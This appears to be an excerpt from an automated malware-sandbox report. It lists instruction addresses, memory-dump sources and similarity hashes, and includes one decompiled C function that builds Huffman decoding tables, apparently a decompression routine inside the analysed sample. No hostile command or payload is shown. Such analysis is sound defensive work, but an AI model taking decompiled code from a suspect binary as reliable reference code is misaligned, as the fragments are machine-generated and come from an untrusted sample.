                                                                          0x00405e3c
                                                                          0x00405e40
                                                                          0x00405e4a
                                                                          0x00405e54
                                                                          0x00405e57
                                                                          0x00405e5d
                                                                          0x00405f91
                                                                          0x00405f93
                                                                          0x00405f99
                                                                          0x00405f9c
                                                                          0x00405f9f
                                                                          0x00000000
                                                                          0x00405f9f
                                                                          0x00405e63
                                                                          0x00405e63
                                                                          0x00405e64
                                                                          0x00405ebc
                                                                          0x00405ebc
                                                                          0x00405ec3
                                                                          0x00405f69
                                                                          0x00405f69
                                                                          0x00405f6e
                                                                          0x00405f71
                                                                          0x00405f76
                                                                          0x00405f79
                                                                          0x00405f7e
                                                                          0x00405f81
                                                                          0x00405f86
                                                                          0x00405f89
                                                                          0x00405f89
                                                                          0x00000000
                                                                          0x00405ec9
                                                                          0x00405ec9
                                                                          0x00405ec9
                                                                          0x00405ec9
                                                                          0x00405ecd
                                                                          0x00405ecd
                                                                          0x00405eef
                                                                          0x00405ef2
                                                                          0x00405ef4
                                                                          0x00405ef7
                                                                          0x00405efc
                                                                          0x00405ed2
                                                                          0x00405ed2
                                                                          0x00405ed7
                                                                          0x00405ed9
                                                                          0x00405edb
                                                                          0x00405ee0
                                                                          0x00405ee6
                                                                          0x00405eeb
                                                                          0x00405eed
                                                                          0x00405eed
                                                                          0x00405ee2
                                                                          0x00405ee2
                                                                          0x00405ee2
                                                                          0x00405ee0
                                                                          0x00000000
                                                                          0x00405efe
                                                                          0x00405f2b
                                                                          0x00405f30
                                                                          0x00405f32
                                                                          0x00405f33
                                                                          0x00405f35
                                                                          0x00405f36
                                                                          0x00405f36
                                                                          0x00405f36
                                                                          0x00405f5e
                                                                          0x00405f63
                                                                          0x00405f63
                                                                          0x00000000
                                                                          0x00405f63
                                                                          0x00405efc
                                                                          0x00405ec3
                                                                          0x00405e66
                                                                          0x00405e66
                                                                          0x00405e67
                                                                          0x00405eb1
                                                                          0x00000000
                                                                          0x00405eb1
                                                                          0x00405e69
                                                                          0x00405e6a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405fc6
                                                                          0x00405fc6
                                                                          0x00405fc6
                                                                          0x00405fc9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405fa6
                                                                          0x00405fa6
                                                                          0x00405faa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405fb0
                                                                          0x00405fb0
                                                                          0x00405fb3
                                                                          0x00405fb6
                                                                          0x00405fbb
                                                                          0x00405fbd
                                                                          0x00405fc0
                                                                          0x00405fc3
                                                                          0x00405fc3
                                                                          0x00405fc3
                                                                          0x00405fcb
                                                                          0x00405fcb
                                                                          0x00405fce
                                                                          0x00405fd0
                                                                          0x00405fd5
                                                                          0x00405fd8
                                                                          0x00405fda
                                                                          0x00405fdd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405fe3
                                                                          0x00405fe3
                                                                          0x00405fe5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405feb
                                                                          0x00405feb
                                                                          0x00405fef
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405ff5
                                                                          0x00405ff5
                                                                          0x00405ff8
                                                                          0x00405ffa
                                                                          0x00406098
                                                                          0x00406098
                                                                          0x0040609b
                                                                          0x0040609d
                                                                          0x0040609d
                                                                          0x004060a0
                                                                          0x004060a3
                                                                          0x004060a5
                                                                          0x004060a7
                                                                          0x004060a9
                                                                          0x004060a9
                                                                          0x004060b2
                                                                          0x004060b7
                                                                          0x004060ba
                                                                          0x004060bd
                                                                          0x004060c0
                                                                          0x004060c3
                                                                          0x004060c3
                                                                          0x004060c3
                                                                          0x004060c6
                                                                          0x004060cc
                                                                          0x004060cc
                                                                          0x004060d2
                                                                          0x004060d2
                                                                          0x004060d2
                                                                          0x00000000
                                                                          0x004060c6
                                                                          0x00406000
                                                                          0x00406000
                                                                          0x00406006
                                                                          0x00406009
                                                                          0x0040600b
                                                                          0x00406036
                                                                          0x00406039
                                                                          0x0040603f
                                                                          0x00406044
                                                                          0x0040604a
                                                                          0x00406050
                                                                          0x00406052
                                                                          0x00406055
                                                                          0x0040605e
                                                                          0x00406064
                                                                          0x00406064
                                                                          0x00406057
                                                                          0x00406059
                                                                          0x0040605b
                                                                          0x0040605b
                                                                          0x00406066
                                                                          0x0040606c
                                                                          0x0040606f
                                                                          0x00406071
                                                                          0x00406073
                                                                          0x00406079
                                                                          0x0040607b
                                                                          0x0040607d
                                                                          0x00406080
                                                                          0x00406089
                                                                          0x00406089
                                                                          0x0040608b
                                                                          0x00406082
                                                                          0x00406082
                                                                          0x00406085
                                                                          0x00406085
                                                                          0x0040608d
                                                                          0x0040608d
                                                                          0x0040607b
                                                                          0x00406090
                                                                          0x00406092
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406092
                                                                          0x0040600d
                                                                          0x0040600d
                                                                          0x00406013
                                                                          0x00406019
                                                                          0x0040601b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040601d
                                                                          0x0040601d
                                                                          0x0040601f
                                                                          0x00406021
                                                                          0x00406024
                                                                          0x0040602b
                                                                          0x0040602b
                                                                          0x0040602d
                                                                          0x00406026
                                                                          0x00406026
                                                                          0x00406028
                                                                          0x00406028
                                                                          0x0040602f
                                                                          0x00406031
                                                                          0x00406034
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406138
                                                                          0x0040613b
                                                                          0x0040613e
                                                                          0x00406144
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040631b
                                                                          0x0040631b
                                                                          0x0040631b
                                                                          0x0040631e
                                                                          0x00406321
                                                                          0x00406323
                                                                          0x00406326
                                                                          0x0040632c
                                                                          0x00406333
                                                                          0x00406335
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406209
                                                                          0x00406209
                                                                          0x00406231
                                                                          0x00406231
                                                                          0x00406231
                                                                          0x00406233
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406211
                                                                          0x00406211
                                                                          0x00406215
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040621b
                                                                          0x0040621b
                                                                          0x0040621e
                                                                          0x00406221
                                                                          0x00406224
                                                                          0x00406226
                                                                          0x00406228
                                                                          0x0040622b
                                                                          0x0040622e
                                                                          0x0040622e
                                                                          0x0040622e
                                                                          0x00406235
                                                                          0x00406235
                                                                          0x0040623d
                                                                          0x00406240
                                                                          0x00406246
                                                                          0x00406249
                                                                          0x0040624d
                                                                          0x00406251
                                                                          0x00406254
                                                                          0x00406257
                                                                          0x0040626f
                                                                          0x0040626f
                                                                          0x00406272
                                                                          0x00406280
                                                                          0x00406283
                                                                          0x00406274
                                                                          0x00406274
                                                                          0x00406276
                                                                          0x0040627d
                                                                          0x0040627d
                                                                          0x004062ac
                                                                          0x004062ac
                                                                          0x004062ac
                                                                          0x004062af
                                                                          0x004062b1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040628c
                                                                          0x0040628c
                                                                          0x00406290
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406296
                                                                          0x00406296
                                                                          0x00406299
                                                                          0x0040629c
                                                                          0x0040629f
                                                                          0x004062a1
                                                                          0x004062a3
                                                                          0x004062a6
                                                                          0x004062a9
                                                                          0x004062a9
                                                                          0x004062a9
                                                                          0x004062b3
                                                                          0x004062b3
                                                                          0x004062b5
                                                                          0x004062b7
                                                                          0x004062c2
                                                                          0x004062c5
                                                                          0x004062c8
                                                                          0x004062ca
                                                                          0x004062cc
                                                                          0x004062ce
                                                                          0x004062d1
                                                                          0x004062d4
                                                                          0x004062d9
                                                                          0x004062dc
                                                                          0x004062df
                                                                          0x004062e2
                                                                          0x004062e9
                                                                          0x004062ec
                                                                          0x004062ee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004062f4
                                                                          0x004062f4
                                                                          0x004062f8
                                                                          0x00406309
                                                                          0x00406309
                                                                          0x00406309
                                                                          0x0040630b
                                                                          0x0040630b
                                                                          0x0040630f
                                                                          0x0040630f
                                                                          0x0040630f
                                                                          0x00406311
                                                                          0x00406312
                                                                          0x00406315
                                                                          0x00406315
                                                                          0x00406315
                                                                          0x00406318
                                                                          0x00000000
                                                                          0x00406318
                                                                          0x004062fa
                                                                          0x004062fa
                                                                          0x004062fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406303
                                                                          0x00406303
                                                                          0x00000000
                                                                          0x00406303
                                                                          0x00406259
                                                                          0x00406259
                                                                          0x0040625b
                                                                          0x0040625d
                                                                          0x00406260
                                                                          0x00406263
                                                                          0x00406267
                                                                          0x00406267
                                                                          0x0040633b
                                                                          0x0040633b
                                                                          0x0040633e
                                                                          0x00406345
                                                                          0x00406349
                                                                          0x0040634b
                                                                          0x0040634e
                                                                          0x00406351
                                                                          0x00406356
                                                                          0x00406359
                                                                          0x0040635b
                                                                          0x0040635c
                                                                          0x0040635f
                                                                          0x0040636a
                                                                          0x0040636d
                                                                          0x00406384
                                                                          0x00406389
                                                                          0x00406390
                                                                          0x00406395
                                                                          0x00406399
                                                                          0x0040639b
                                                                          0x0040639b
                                                                          0x0040639b
                                                                          0x0040639e
                                                                          0x004063a0
                                                                          0x00000000
                                                                          0x004063a6
                                                                          0x004063a6
                                                                          0x004063aa
                                                                          0x004063b5
                                                                          0x004063c8
                                                                          0x004063cd
                                                                          0x004063d2
                                                                          0x004063d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004063da
                                                                          0x004063da
                                                                          0x004063dd
                                                                          0x004063df
                                                                          0x004063ed
                                                                          0x004063ed
                                                                          0x004063f0
                                                                          0x004063f0
                                                                          0x004063f3
                                                                          0x004063f6
                                                                          0x004063f9
                                                                          0x004063fc
                                                                          0x004063ff
                                                                          0x00406402
                                                                          0x00000000
                                                                          0x00406402
                                                                          0x004063e1
                                                                          0x004063e1
                                                                          0x004063e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004063e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406786
                                                                          0x00406786
                                                                          0x0040678c
                                                                          0x00406792
                                                                          0x00406797
                                                                          0x0040679d
                                                                          0x004067a3
                                                                          0x004067a5
                                                                          0x004067a8
                                                                          0x004067b1
                                                                          0x004067b7
                                                                          0x004067b7
                                                                          0x004067aa
                                                                          0x004067ac
                                                                          0x004067ae
                                                                          0x004067ae
                                                                          0x004067b9
                                                                          0x004067bb
                                                                          0x004067be
                                                                          0x004067f9
                                                                          0x004067f9
                                                                          0x00000000
                                                                          0x004067c0
                                                                          0x004067c0
                                                                          0x004067c0
                                                                          0x004067c6
                                                                          0x004067c9
                                                                          0x004067cb
                                                                          0x00406800
                                                                          0x00406802
                                                                          0x00000000
                                                                          0x00406802
                                                                          0x00000000
                                                                          0x004067cb
                                                                          0x00000000
                                                                          0x00405e0a
                                                                          0x004067d8
                                                                          0x00000000
                                                                          0x004067d8
                                                                          0x004061ec
                                                                          0x004061ee
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004061f0
                                                                          0x004061f0
                                                                          0x004061f3
                                                                          0x00000000
                                                                          0x004061f3
                                                                          0x00406138
                                                                          0x004060f9
                                                                          0x004067dd
                                                                          0x004067e0
                                                                          0x004067e2
                                                                          0x004067eb
                                                                          0x004067f1
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f87c7fd812bd23a44b041bc42b52fb770af610f3898ecf88972882777d09f08b
                                                                          • Instruction ID: e18c77a923ccc912ff38ee9e75da799f543520498237710dfa30f1c5ce12811a
                                                                          • Opcode Fuzzy Hash: f87c7fd812bd23a44b041bc42b52fb770af610f3898ecf88972882777d09f08b
                                                                          • Instruction Fuzzy Hash: 4CE16871900B09DFDB24CF58C880BAAB7F5EF44305F15852EE897AB291D338AA95CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004068B0, Relevance: .3, Instructions: 300COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004068B0(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6b8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6b8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6b8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                          0x004068bb
                                                                          0x004068c3
                                                                          0x004068c7
                                                                          0x004068c9
                                                                          0x004068cc
                                                                          0x004068ce
                                                                          0x004068ce
                                                                          0x004068d0
                                                                          0x004068d7
                                                                          0x004068d9
                                                                          0x004068d9
                                                                          0x004068df
                                                                          0x004068f4
                                                                          0x004068fc
                                                                          0x004068fe
                                                                          0x00406900
                                                                          0x00406903
                                                                          0x00406904
                                                                          0x00406904
                                                                          0x0040690a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040690c
                                                                          0x0040690f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040690f
                                                                          0x00406913
                                                                          0x00406916
                                                                          0x00406918
                                                                          0x00406918
                                                                          0x0040691b
                                                                          0x00406921
                                                                          0x00406922
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406922
                                                                          0x00406927
                                                                          0x0040692a
                                                                          0x0040692c
                                                                          0x0040692c
                                                                          0x00406932
                                                                          0x00406934
                                                                          0x00406945
                                                                          0x00406938
                                                                          0x0040693c
                                                                          0x00406be1
                                                                          0x00000000
                                                                          0x00406be1
                                                                          0x00406942
                                                                          0x00406943
                                                                          0x00406943
                                                                          0x0040694b
                                                                          0x0040694e
                                                                          0x00406952
                                                                          0x00406954
                                                                          0x00406956
                                                                          0x00406959
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406961
                                                                          0x00406967
                                                                          0x00406969
                                                                          0x0040696b
                                                                          0x0040696c
                                                                          0x00406981
                                                                          0x00406981
                                                                          0x00406984
                                                                          0x00406986
                                                                          0x00406986
                                                                          0x00406988
                                                                          0x0040698d
                                                                          0x0040698f
                                                                          0x00406996
                                                                          0x00406998
                                                                          0x004069a0
                                                                          0x004069a0
                                                                          0x004069a2
                                                                          0x004069a3
                                                                          0x004069b2
                                                                          0x004069b6
                                                                          0x004069ba
                                                                          0x004069bd
                                                                          0x004069c0
                                                                          0x004069c5
                                                                          0x004069c8
                                                                          0x004069ce
                                                                          0x004069d5
                                                                          0x004069db
                                                                          0x00406bd4
                                                                          0x00406bd4
                                                                          0x00406bd9
                                                                          0x00406be8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406bd9
                                                                          0x004069e8
                                                                          0x004069eb
                                                                          0x004069ee
                                                                          0x004069f1
                                                                          0x004069f5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a00
                                                                          0x00406a03
                                                                          0x00406a04
                                                                          0x00406a06
                                                                          0x00406a0c
                                                                          0x00406a0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a15
                                                                          0x00406a16
                                                                          0x00406a19
                                                                          0x00406a1c
                                                                          0x00406a1f
                                                                          0x00406a25
                                                                          0x00406a27
                                                                          0x00406a27
                                                                          0x00406a2f
                                                                          0x00406a33
                                                                          0x00406a38
                                                                          0x00406a5d
                                                                          0x00406a63
                                                                          0x00406a65
                                                                          0x00406a67
                                                                          0x00406a6a
                                                                          0x00406a73
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a3a
                                                                          0x00406a3a
                                                                          0x00406a43
                                                                          0x00406a47
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a58
                                                                          0x00406a58
                                                                          0x00406a5b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a4b
                                                                          0x00406a4e
                                                                          0x00406a50
                                                                          0x00406a54
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a56
                                                                          0x00406a56
                                                                          0x00000000
                                                                          0x00406a58
                                                                          0x00406a7c
                                                                          0x00406a82
                                                                          0x00406a8c
                                                                          0x00406a8e
                                                                          0x00406a93
                                                                          0x00406a95
                                                                          0x00406acb
                                                                          0x00406a97
                                                                          0x00406a97
                                                                          0x00406a9a
                                                                          0x00406a9d
                                                                          0x00406aa7
                                                                          0x00406aaa
                                                                          0x00406ab1
                                                                          0x00406abc
                                                                          0x00406ac3
                                                                          0x00406ac3
                                                                          0x00406acd
                                                                          0x00406ad0
                                                                          0x00406ad2
                                                                          0x00406ad8
                                                                          0x00406ad8
                                                                          0x00406ae1
                                                                          0x00406ae4
                                                                          0x00406ae9
                                                                          0x00406af8
                                                                          0x00406b00
                                                                          0x00406b05
                                                                          0x00406b29
                                                                          0x00406b31
                                                                          0x00406b35
                                                                          0x00406b3b
                                                                          0x00406b07
                                                                          0x00406b15
                                                                          0x00406b18
                                                                          0x00406b1e
                                                                          0x00406b1e
                                                                          0x00406b3f
                                                                          0x00406afa
                                                                          0x00406afa
                                                                          0x00406afa
                                                                          0x00406b50
                                                                          0x00406b54
                                                                          0x00406b60
                                                                          0x00406b5b
                                                                          0x00406b5e
                                                                          0x00406b5e
                                                                          0x00406b68
                                                                          0x00406b6d
                                                                          0x00406b75
                                                                          0x00406b71
                                                                          0x00406b73
                                                                          0x00406b73
                                                                          0x00406b7b
                                                                          0x00406b7d
                                                                          0x00406b84
                                                                          0x00406b8e
                                                                          0x00406b98
                                                                          0x00406bb4
                                                                          0x00406bb8
                                                                          0x004069fd
                                                                          0x00406a03
                                                                          0x00406a04
                                                                          0x00406a06
                                                                          0x00406a0c
                                                                          0x00406a0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406a0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406b9a
                                                                          0x00406b9a
                                                                          0x00406b9a
                                                                          0x00406b9f
                                                                          0x00406ba8
                                                                          0x00406bb1
                                                                          0x00000000
                                                                          0x00406bb1
                                                                          0x00406bbe
                                                                          0x00406bbe
                                                                          0x00406bc1
                                                                          0x00406bc8
                                                                          0x00406bcb
                                                                          0x00000000
                                                                          0x004069ee
                                                                          0x0040696e
                                                                          0x00406970
                                                                          0x00406970
                                                                          0x00406974
                                                                          0x00406977
                                                                          0x00406978
                                                                          0x00406978
                                                                          0x00000000
                                                                          0x00406970
                                                                          0x004068e4
                                                                          0x004068ea
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ebd65a60c0032f06b53db8cd248ad540ce2340f2c19aa7aff15973d4adb3dcb0
                                                                          • Instruction ID: beb3b00561468fd2f1c3efb1f10135777f0892a972df78f043b62560f053f409
                                                                          • Opcode Fuzzy Hash: ebd65a60c0032f06b53db8cd248ad540ce2340f2c19aa7aff15973d4adb3dcb0
                                                                          • Instruction Fuzzy Hash: 31C14B71A00229CBCF14DF68D4905EEB7B2FF99314F26816AD856BB380D734A952CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02911825, Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220670913.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                          • Instruction ID: 51c968e8b4147f3920bce7342b43651c3016f210f8705f65ac88178397c89435
                                                                          • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                          • Instruction Fuzzy Hash: F5010C78A11208EFCB81DF99C584A9DBBF5EB08620F5185A6E919E7721E330AE50DB40
